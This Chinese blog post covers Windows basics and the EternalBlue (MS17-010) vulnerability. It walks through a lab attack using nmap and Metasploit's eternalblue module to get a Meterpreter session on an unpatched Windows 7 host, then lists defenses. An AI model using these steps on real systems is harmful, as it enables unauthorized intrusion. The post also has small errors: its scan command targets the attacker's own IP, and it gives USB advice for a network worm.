欢迎光临
我们一直在努力

Windows系统基础安全与经典“永恒之蓝”

是什么Windows操作系统

电脑的 “管家 + 翻译官 + 平台”

  • 管硬件:CPU、内存、硬盘、显卡、键盘鼠标、显示器
  • 管软件:让 QQ、浏览器、游戏、Office 能运行
  • 给你界面:点图标、点菜单、拖窗口,而不是敲黑框命令

没有操作系统,电脑就是一堆不会动的硬件。

Windows 核心特点

  • 图形界面友好:窗口、菜单、鼠标操作,易用性强,普通用户易上手。
  • 兼容性极强:支持海量软件、游戏、外设驱动,生态最完善。
  • 多任务多线程:可同时运行多个程序,稳定调度硬件资源。
  • 软硬件生态庞大:办公、游戏、开发、工控等场景全覆盖。
  • 闭源商业系统:由微软统一维护、更新与安全补丁。
  • 面向普通用户与企业:兼顾家用娱乐、办公生产和企业服务器。

常见windows版本

Windows 专业版(桌面操作系统)

主要给个人、办公、开发、设计用,带图形界面、支持日常软件。

  • Windows 11 专业版(Win11 Pro):最新专业版,界面现代化,支持更高硬件配置,适合新电脑办公 / 生产力。
  • Windows 10 专业版(Win10 Pro):主流办公 / 开发版本,比家庭版多组策略、远程桌面、域加入功能。
  • Windows 10 企业版 / LTSC:长期稳定版,无自动更新、无应用商店,工控、企业专用。
  • Windows 7 专业版 / 旗舰版:经典老版本,兼容性极强,很多老企业、老软件仍在使用。

Windows 服务器版(Server 系统)

用于服务器、网站、数据库、云平台、企业内网,强调稳定、安全、后台服务。

  • Windows Server 2008 / 2008 R2:经典老服务器系统,很多老旧企业服务器仍在运行。
  • Windows Server 2012 / 2012 R2:稳定性强,广泛用于中小企业服务器。
  • Windows Server 2016:开始强化云、容器、虚拟化,现代服务器常用版本。
  • Windows Server 2019:安全性、性能大幅提升,目前企业主流。
  • Windows Server 2022:最新服务器系统,云原生、安全更强,新服务器首选。

Windows系统的安全风险

“永恒之蓝”(MS17-010)安全事件

2017年震惊全球的重大网络安全事件,核心是NSA 泄露的 Windows SMB 漏洞被黑客利用,引发 WannaCry 勒索病毒全球大爆发。

  • 漏洞本质:Windows SMBv1 协议远程代码执行漏洞(编号:CVE-2017-0144,微软补丁:MS17-010)。
  • 来源:美国国家安全局(NSA) 开发的网络攻击武器,2017年4月被黑客组织影子经纪人(Shadow Brokers)公开泄露。
  • 攻击入口:利用 Windows 默认开放的445 端口(文件共享),无需用户交互即可远程入侵。
  • 影响系统:Windows XP/7/8、Server 2003/2008/2012 等未打补丁的旧版系统。

攻击场景复现

(以下过程只作为演示,均在靶机内实现,严谨未经授权私自攻击他人主机)

实验环境

攻击机:Kali Linux(IP:192.168.255.128需联⽹配置,安装 Metasploit 框架)

⽬标机:Windows 7 旗舰版(IP:192.168.255.122,开启 SMB 服务,未安装 MS17-010 补丁)

步骤解析

1.漏洞扫描:通过 nmap 脚本检测⽬标是否存在 MS17-010 漏洞

nmap –script smb-vuln* 192.168.255.128

若输出中显示"VULNERABLE",则确认⽬标存在该漏洞

2.启动 Metasploit 框架

msfconsole

3.搜索漏洞模块

search ms17-010

4.选择攻击模块并配置攻击信息

use exploit/windows/smb/ms17_010_eternalblue    选择永恒之蓝利⽤模块(输⼊对应序号也可)

set rhosts 192.168.255.122    设置⽬标机 IP

set lhost 192.168.255.128    设置攻击机 IP(Kali 本机 IP)

5.执行攻击

配置完毕输入run或exploit执⾏攻击

攻击成功后,将获得⽬标机的 Meterpreter 交互式会话

永恒之蓝(MS17-010)防御方法

1. 打补丁(最根本)

安装微软的 MS17-010 安全补丁

  • Win7 / 2008 / 2012 / 2016 都必须装

  • XP/2003 微软也出了紧急补丁,一定要打

2. 关闭 445 端口(最关键)

永恒之蓝就是走 445 端口 入侵的。关闭或防火墙禁止 445 入站,直接防住 99% 攻击。

3. 禁用 SMBv1 协议

永恒之蓝利用的是 SMBv1 漏洞。Win7 以上系统都可以安全禁用 SMBv1。

4. 不要乱插 U 盘、不乱点文件

永恒之蓝是蠕虫病毒,会通过局域网传播。

5. 开启防火墙

Windows 自带防火墙一定要开,默认会拦很多危险端口。

网络攻击、非法入侵均属违法行为,仅可在授权环境下学习研究。严守法律法规,树立安全意识,共同维护网络安全!!!

赞(0)
未经允许不得转载:171主机测评 » Windows系统基础安全与经典“永恒之蓝”
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址